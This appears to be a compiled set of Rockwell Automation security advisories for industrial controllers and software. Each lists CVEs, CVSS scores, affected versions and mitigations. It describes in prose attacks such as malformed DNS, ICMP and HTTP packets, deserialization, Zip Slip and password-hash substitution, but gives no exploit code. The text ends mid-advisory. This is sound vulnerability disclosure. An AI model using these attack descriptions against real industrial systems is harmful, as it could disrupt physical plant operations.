Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

2.0

Revision History

Version 2.0 - September 9, 2025

Version 1.0 – August 9, 2021

Executive Summary

Rockwell Automation received a report from CERT/CC with research done by Forescout Technologies and Vdoo regarding fourteen vulnerabilities in the products listed below. If successfully exploited, these vulnerabilities may result in the products faulting and/or ceasing communications, requiring the power to be cycled to the product to recover.

Customers using affected versions of these products are encouraged to evaluate the following mitigations provided below and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided below.

Update 2.0 - September 9, 2025

Fix available for 1715-AENTR vulnerabilities

Product

Vulnerability

Affected Versions

Remediation

1715-AENTR

CVE-2020-35683

CVE-2020-35684

CVE-2020-35685

CVE-2021-31400

CVE-2021-31401

Firmware 3.003 and previous

Upgrade to Version 3.011 or later.

Affected Products

20-COMM-ER	All Versions
ArmorStart 28xE	All Versions
1715-AENTR	All Versions
AADvance Safety Controller	All Versions
AADvance Eurocard Controllers	All Versions

Vulnerability Details

CVE-2020-25767: Malformed DNS Response could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to form a malformed response to a DNS request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-25928: Malformed DNS Response could cause a device to fault due to a heap overflow.

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed DNS response, which would result in a heap-buffer overflow resulting in a possible information leak, remote code execution, or the device to fault and/or cease communications requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 9.8/10 [CRITICAL]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-25927: Malformed DNS Response could cause a device to fault.

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed DNS response, which would result in an Out-of-Bounds read resulting in a device fault and/or cessation of communications requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 8.2/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

CVE-2020-25926: Insufficiently randomized transaction IDs could facilitate DNS cache poisoning attacks

A REMOTE, UNAUTHENTICATED attacker may be able to poison the DNS cache of the device due to transaction IDs not being properly randomized.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 4.0/10 [MEDIUM]
Researcher CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N

CVE-2020-27565: Malformed HTTP request could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-35683: Malformed ICMP packet could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed ICMP packet, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-35684: Malformed ICMP packet could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed ICMP packet, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-35685: TCP connections may be hikjacked due to an insufficiently random source

A REMOTE, UNAUTHENTICATED attacker may be able to hijack a TCP connection and spoof the device’s network connections.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2021-31400: Malformed TCP segment could cause device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed TCP segment, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2021-31401: Malformed TCP header could cause device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed TCP header, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2021-31226: Malformed HTTP POST request could cause device to fault or bypass authentication

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP Post request, which would result in the device faulting and/or ceasing communications and requiring a power cycle, or possibly bypassing an authentication attempt.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 9.1/10 [CRITICAL]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CVE-2021-31227: Malformed HTTP POST request could cause device to fault by overwriting memory

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP Post request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2021-31228: Non-random source port could lead to a spoofed DNS response

A REMOTE, UNAUTHENTICATED attacker may be able to spoof a DNS response, which would result in the device communicating with a potentially malicious server.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 4.0/10 [MEDIUM]
Researcher CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N

CVE-2021-36762: TFTP packet processing function does not ensure that the filename is null-terminated

Rockwell Automation is not impacted by this vulnerability

Risk Mitigation & User Action

Customers using the affected firmware are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

Product	Vulnerability	Mitigation
20-COMM-ER	CVE-2021-31226 CVE-2021-31227	Disable the webserver. See the product’s user manual for the procedure to do this.

General Security Guidelines

Use proper network infrastructure controls, such as firewalls, to help confirm that DNS traffic from unauthorized sources is blocked.

Block traffic to port 80 (HTTP) and ICMP traffic using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High

PN1571 | PN1571 | MicroLogix 1100 Persistent CPU Fault Vulnerability

Published Date:

July 09, 2021

Last Updated:

July 09, 2021

CVE IDs:

CVE-2021-33012

Products:

1763 MicroLogix 1100

CVSS Scores:

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – July 9, 2021. Initial Release

Executive Summary

Rockwell Automation received a report from Beau Taub at Bayshore Networks regarding a vulnerability in the MicroLogix 1100. If successfully exploited, this vulnerability may limit the availability of the programmable logic controller. Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

MicroLogix 1100, all versions.

Vulnerability Details

CVE-2021-33012: Persistent fault may lead to denial of service conditions.

A vulnerability exists in the MicroLogix 1100 that may allow a remote, unauthenticated attacker to cause a persistent fault condition. This condition will prevent the PLC from entering a RUN state which cannot be fixed by resetting the device. If successfully exploited, this vulnerability will cause the controller to fault when the controller is switched to RUN mode.

CVSS v3.1 Base Score: 8.6 /10 [High]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected firmware are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Vulnerability	Suggested Actions
CVE-2021-33012	Put the controller mode switch to “Run” mode. Customer’s should consider migrating to a more contemporary controller. Customers are encouraged to have a backup copy of the project in the case it is necessary to recover from an event.

A controller in this state can be recovered by downloading a new project to the controller or an offline copy of the project.

Additionally, Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines on how to use Rockwell Automation products to improve the security of their industrial automation systems.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Use proper network infrastructure controls, such as firewalls, to help confirm that EtherNet/IP™ network traffic from unauthorized sources are blocked.
Consult the product documentation for specific features, such as a hardware mode switch setting, to which may be used to block unauthorized changes, etc.
Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products

General Mitigations

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.

Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High

PN1569 | PN1569 | FactoryTalk Security Remote Desktop Connection ‘Computer Name’ Policy Bypass Vulnerability

Published Date:

June 10, 2021

Last Updated:

June 10, 2021

CVE IDs:

CVE-2021-32960

Products:

FactoryTalk Services Platform

CVSS Scores:

8.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 - June 10, 2021. Initial Release.

Executive Summary

Rockwell Automation discovered a vulnerability in FactoryTalk^® Security, part of FactoryTalk Service Platform. This vulnerability, if successfully exploited, may allow remote, authenticated users to bypass FactoryTalk Security policies that are based on a computer name. These policies may be important to customers who are concerned about users at an engineering workstation having ‘line-of-site’ visibility to the systems they are operating.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Services Platform v6.11 and earlier, if FactoryTalk Security is enabled and deployed.

Vulnerability Details

CVE-2021-32960: FactoryTalk Security protection mechanism failure for remote desktop connections
FactoryTalk Services Platform contains a vulnerability that may allow a remote, authenticated attacker to bypass FactoryTalk Security policies based on the computer name. If successfully exploited, this may allow an attacker to have the same privileges as if they were logged on to the client machine.

CVSS v3.1 Base Score: 8.5/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these tactics with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability	Suggested Actions
CVE-2021-32960	Apply FactoryTalk Services Platform v6.20 or later.

If upgrade is not possible, customers should consider the following guidance:

When possible, do not utilize remote desktop connections.
Use Microsoft® Event Logger or similar event logging application to monitor atypical remote desktop connections and disconnections. Information on Setting up Windows® Event Logs is available at Knowledgebase Article QA5965.

General Security Guidelines

Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knoweldgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Medium

PN1566 | PN1566 | Micro800 and MicroLogix 1400 Vulnerable to Man-in-the-Middle Attack

Published Date:

May 25, 2021

Last Updated:

May 25, 2021

CVE IDs:

CVE-2021-32926

Products:

Micro800, 1766 MicroLogix 1400

CVSS Scores:

6.1

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – May 25, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Adeen Ayub from Virginia Commonwealth University, Hyunguk Yoo from The University of New Orleans, and Irfan Ahmed from Virginia Commonwealth University regarding a man-in-the-middle vulnerability in the Micro800™ and MicroLogix™ 1400. If successfully exploited, this vulnerability may result in denial-of-service conditions. To recover from this condition, a firmware flash on the controller will need to be performed. Firmware flashing will put the controller into the default state and the user program and data will be lost.

Customers using affected products are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Micro800, all versions.
MicroLogix 1400, version 21 and later when Enhanced Password Security enabled.

Vulnerability Details

CVE-2021-32926: Improper authentication may lead to denial of service conditions
A vulnerability exists in how the Micro800 and MicroLogix 1400 controllers authenticate password change requests. If successfully exploited, this vulnerability may allow a remote, unauthenticated attacker to perform a man –in-the-middle attack in which the attacker intercepts the message that includes the legitimate, new password hash and replaces the legitimate password hash with an illegitimate hash. The user would no longer be able to authenticate to the controller causing a denial-of-service condition.

CVSS v3.1 Base Score: 6.1/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected controllers are directed towards risk mitigation. Rockwell Automation has determined that this vulnerability cannot be remediated with a patch. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

Vulnerability	Suggested Actions
CVE-2021-32926	Confirm that setting and updating the password for the controller is done within a trusted network environment that is only accessible to authorized users.

If this vulnerability is successfully exploited, the password can be reset by performing a firmware flash on the controller. The password can be reset by performing a firmware flash on the controller. Firmware flashing will put the controller into the default state and the user program and data will be lost.

A comprehensive defense-in-depth strategy can reduce the risk of this vulnerability. To leverage the vulnerability, an unauthorized user would require access to the same network as the controller. Customers should confirm they are employing proper networking segmentation and security controls.

Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines on how to use Rockwell Automation products to improve the security of their industrial automation systems.

General Security Guidelines

Use proper network infrastructure controls, such as firewalls, to confirm that CIP™ traffic from unauthorized sources is blocked.
Block all traffic to EtherNet/IP™ or other CIP protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 44818 and Port# 2222 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High

PN1565 | PN1565 | Connected Components Workbench Vulnerable to Multiple Phishing-Style Attacks

Published Date:

May 13, 2021

Last Updated:

May 13, 2021

CVE IDs:

CVE-2021-27473, CVE-2021-27471, CVE-2021-27475

Products:

Connected Components Workbench

CVSS Scores:

6.1, 7.7, 8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 - May 13, 2021. Initial Release.

Executive Summary

Rockwell Automation received a report from Mashav Sapir of Claroty regarding three vulnerabilities in Connected Components Workbench™. If successfully exploited, these vulnerabilities may result in directory traversal, privilege escalation, and arbitrary code execution. These vulnerabilities all require user interaction through a phishing attack, for example, to be successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Connected Components Workbench v12.00.00 and below.

Vulnerability Details

CVE-2021-27475: Deserialization of untrusted data may result in arbitrary code execution
Connected Components Workbench does not limit the objects, which can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in Connected Components Workbench, may result in remote code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2021-27471: Directory traversal vulnerability may lead to privilege escalation
The parsing mechanism that processes certain file types does not provide input sanitization for file paths. This may allow an attacker to craft malicious files that when opened by Connected Components Workbench can traverse the file system. If successfully exploited, an attacker would be able to overwrite existing files and create additional files with the same permissions of the Connected Components Workbench software. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 7.7/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2021-27473: Improper input sanitization may lead to privilege escalation
Connected Components Workbench does not to sanitize paths specified within the .ccwarc archive file during extraction. This type of vulnerability is also commonly referred to as a Zip Slip. A local, authenticated attacker can create a malicious .ccwarc archive file that when opened by Connected Components Workbench will allow the attacker to gain the privileges of the software. If the software is running at SYSTEM level, the attacker will gain admin level privileges. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 6.1/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability	Suggested Actions
CVE-2021-27475 CVE-2021-27471 CVE-2021-27471	Upgrade to Connected Components Workbench v13.00.00 or later. (Link)

If upgrade is not possible, customers should consider deploying the following mitigations:

Run Connected Components Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Do not open untrusted .ccwarc, files with Connected Components Workbench. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
Use of Microsoft® AppLocker or another similar allow list application that can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329.
Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Critical

PN1564 | PN1564 | DNS Name:Wreck Vulnerabilities Affect Multiple Rockwell Automation Products

Published Date:

April 28, 2021

Last Updated:

April 28, 2021

CVE IDs:

CVE-2016-20009

Products:

5069 CompactLogix, Communications Modules, 1769 CompactLogix Controllers, 1756 ControlLogix

CVSS Scores:

9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 - April 26, 2021. Initial release.

Revision History

Revision Number

1.1

Revision History

Version 1.1 - April 28, 2021. Updated affected products and suggested user actions.

Executive Summary

On April 12, 2021 Forescout and JSOF released a report titled "NAME:WRECK" regarding nine DNS-related vulnerabilities against 4 TCP/IP stacks utilized by many different technology vendors, including Rockwell Automation™. Rockwell Automation is impacted by one of these nine reported vulnerabilities. This vulnerability, if successfully exploited, may result in remote code execution.

Rockwell Automation continues to investigate impact of these vulnerabilities and will update this advisory if additional products are impacted. We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knoweldgebase.

Customers using potentially affected products are encouraged to evaluate their own systems and apply the appropriate mitigations from those listed below. Additional details relating to the discovered vulnerablity and recommended countermeasures, are provided herein.

Affected Products

Product Family	Catalogs	Affected Versions
Compact 5000™ I/O EtherNet/IP Adapter	5069-AEN2TR	All versions.
CompactLogix 5370	1769-L1y 1769-L2y 1769-L3y	All versions prior to v30.
CompactLogix 5370	1769-L3yS	All versions prior to v30, excluding v28.015
ControlLogix® 5580	1756-L8	All versions prior to v30.
CompactLogix 5380	5069-L3	All versions prior to v30.
ControlLogix EtherNet/IP Module	1756-EN2T/D 1756-EN2TK/D 1756-EN2TXT/D 1756-EN2F/C 1756-EN2FK/C 1756-EN2TR/C 1756-EN2TRK/C 1756-EN2TRXT/C 1756-EN3TR/B 1756-EN3TRK/B 1756-EN2TPK/A 1756-EN2TPXT/A	All versions prior to v11.001.
ControlLogix EtherNet/IP Module	1756-EN2TP/A	All versions prior to v10.020.

Note: GuardLogix^® 5580 and Compact GuardLogix^® 5380 are not affected by this vulnerability.

Vulnerability Details

CVE-2016-20009: Stack-based overflow in the IPnet may lead to remote code execution
In Wind River VxWorks versions 6.5 through 7, the DNS client (IPnet) has a stack-based overflow on the message decompression function. This may allow a remote, unauthenticated attacker to perform remote code execution.

CVSS v3.1 Base Score: 9.8/10[CRITICAL]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware revision that addresses the associated risk. Customers are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Product Family	Catalogs	Suggested Actions
Compact 5000™ I/O EtherNet/IP Adapter	5069-AEN2TR	Will not be patched. Suggested action is to migrate to the 5069-AENTR.
CompactLogix 5370	1769-L1y 1769-L2y 1769-L3y	Apply v30 or later.
CompactLogix 5370	1769-L3yS	Apply v28.015 or v30 or later
ControlLogix® 5580	1756-L8	Apply v30 or later.
CompactLogix 5380	5069-L3	Apply v30 or later.
ControlLogix EtherNet/IP Module	1756-EN2T/D 1756-EN2TK/D 1756-EN2TXT/D 1756-EN2F/C 1756-EN2FK/C 1756-EN2TR/C 1756-EN2TRK/C 1756-EN2TRXT/C 1756-EN3TR/B 1756-EN3TRK/B 1756-EN2TPK/A 1756-EN2TPXT/A	Apply v11.001 or later.
ControlLogix EtherNet/IP Module	1756-EN2TP/A	Apply v10.020 or later.

General Security Guidelines

Utilize proper network infrastructure controls, such as firewalls, to help confirm that traffic from unauthorized sources are blocked.
Consult the product documentation for specific features, such as a hardware mode switch setting which may be used to block unauthorized changes, etc.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knoweldgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Critical

PN1559 | PN1559 | FactoryTalk AssetCentre Vulnerable to Arbitrary Code Execution

Published Date:

April 01, 2021

Last Updated:

April 01, 2021

CVE IDs:

CVE-2021-27466, CVE-2021-27460, CVE-2021-27474, CVE-2021-27468, CVE-2021-27470, CVE-2021-27462, CVE-2021-27464, CVE-2021-27476, CVE-2021-27472

Products:

FactoryTalk AssetCentre

CVSS Scores:

10

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – April 1, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding nine vulnerabilities in FactoryTalk^® AssetCentre software. These vulnerabilities, if successfully exploited, may allow unauthenticated attackers to perform arbitrary command execution, SQL injection, or remote code execution.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk AssetCentre, v10.00 and earlier.

Vulnerability Details

CVE-2021-27462: Deserialization of untrusted data in AosService.rem service may result in arbitrary command execution
